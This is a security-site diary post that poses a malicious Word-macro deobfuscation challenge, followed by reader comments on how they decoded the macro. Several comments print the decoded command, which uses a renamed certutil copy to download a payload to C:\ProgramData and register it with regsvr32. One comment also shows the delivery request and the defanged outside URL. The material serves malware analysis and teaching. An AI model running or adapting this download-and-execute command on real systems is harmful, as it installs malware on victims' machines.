Small Challenge: A Simple Word Maldoc

Published: 2020-08-02. Last Updated: 2020-08-02 20:58:58 UTC
by Didier Stevens (Version: 1)
10 comment(s)

A reader submitted malicious Word document deed contract,07.20.doc (also uploaded the Malware Bazaar).

There are a couple of interesting aspects to this document. The first, that I will point out here, is that the VBA code is quite simple.

The code is quite short. And there is string obfuscation.

In this diary, I'm not going to analyze this document.

If you are interested, I'm challenging you to analyze it. I've copied the code you see above to pastebin, so that you can have a go at it without needing the actual malware sample.

If you participate, please post a comment with your solution. I'm particularly interested in your analysis method, rather than the deobfuscated command.

Have fun :-)


Didier Stevens
Senior handler
Microsoft MVP

Keywords: challenge maldoc
10 comment(s)


Cyberchef: Split, From Decimal, Xor. Detection for the malicious DLL isn't all that great:

- EB
Using LibreOffice on Linux the VBA-Code run with small changes.

'"cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp""

But: I don't understand competly the cmd-command, and on my system Excel blocks all WScript.Run cmd since recently. So does this code launch on a up-to-date system?
Since in the macro itself there is the decode function embedded, I first read that and understand the high level process, then I try to reproduce it using alternative safe tools. In this case, as also e.b. posted, I used CyberChef with the following recipe


The output is
cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"

Basically, the macro first copies the certutil.exe in C:\ProgramData, and then uses the decoded command for downloading a payload using certutil copy. It looks like to be a dll since it is registered in the system via the regsvr32 tool, but this MDN (malware delivery network) resource is not still active, so I'm unable to download that piece of software.
GET /bolb/jaent.php? HTTP/1.1
Accept: */*
User-Agent: CertUtil URL Agent
Pragma: no-cache
Connection: close
URL: 8cfayv(.)com/bolb/jaent(.)php?l=liut6(.)cab
Captured in Burp in Sandbox. However, domain is no more active so can't go further.
Just followed the deobfuscation method of the VBA code with Python:

encoded = "12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77"

characters = encoded.split("%")

for i in range(len(characters)):
characters[i] = chr(int(characters[i]) ^ 111)

decoded = ''.join(characters)


[OUT]: cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"

C:\ProgramData\1.exe seems a copy of certutil.exe, the code gets a CAB to install something and then register it with regsvc32?
To decode on Windows, modify the code to log the result (WScript.Echo LG), encapsulate the relevant function and call to it in a script (.vbs) file and run from a command prompt using the Windows script host (cscript.exe). No additional tools required.
I didn't see this until today (15 Aug 2020, Sat)

>> I'm particularly interested in your analysis method

I'm not a malware analyst, nor do I play one on TV.

However, I do some coding in VBA to automate my compliance work so that was a helpful skill.

I used two tools (on my home computer):
Excel 2007 (which doesn't have Xor, that was introduced in 2013)

Step 1

I took the string being passed to the h() function [ignoring the double quotation marks] and pasted that into cell

A1 in a fresh Excel worksheet

Step 2

Select column A
Data tab, Text to Columns
Select "Delimited"
"Other" checkbox, entered the percent sign into the associated input field

This left me with numeric values in cells A1 thru FM1

Step 3

Discovered that the XOR worksheet function wasn't introduced until 2013 so I wrote my own user-defined function

(UDF) in VBA code

Public Function EXOR(arg_1 As Variant, arg_2 As Variant) As Variant
EXOR = arg_1 Xor arg_2
End Function

I couldn't name my UDF as "Xor" because that's a reserved keyword in VBA so I called it EXOR

Step 4

In Cell A2: =EXOR(A$1,111)
and then copied from B2 thru FM2

In Cell A3: =CHAR(A$2)
and then copied from B3 thru FM3

Selected cells A3 thru FM3 and copied to clipboard

Step 5

In a fresh Notepad document, pasted from clipboard

Selected the whitespace between the first two letters (of 'c' and 'm') and copied to the clipboard

Edit menu, Replace

Pasted the whitespace stuff into the "Find what" field and left the "Replace with" field alone

Replace All


cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
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